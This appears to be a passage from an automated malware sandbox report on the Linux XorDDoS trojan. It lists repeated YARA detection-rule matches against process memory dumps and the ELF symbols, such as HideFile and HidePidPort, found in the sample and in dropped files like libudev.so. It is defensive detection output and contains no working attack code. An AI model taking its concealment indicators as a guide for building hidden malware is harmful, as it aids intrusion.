Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16

Source: 1.elf	ELF static info symbol of initial sample: HideFile
Source: 1.elf	ELF static info symbol of initial sample: HidePidPort
Source: 1.elf	ELF static info symbol of initial sample: __after_morecore_hook
Source: 1.elf	ELF static info symbol of initial sample: __free_hook
Source: 1.elf	ELF static info symbol of initial sample: __libc_register_dl_open_hook
Source: 1.elf	ELF static info symbol of initial sample: __libc_register_dlfcn_hook
Source: 1.elf	ELF static info symbol of initial sample: __malloc_hook
Source: 1.elf	ELF static info symbol of initial sample: __malloc_initialize_hook
Source: 1.elf	ELF static info symbol of initial sample: __memalign_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: HideFile
Source: libudev.so.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __free_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: HideFile
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: __free_hook
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: __malloc_hook
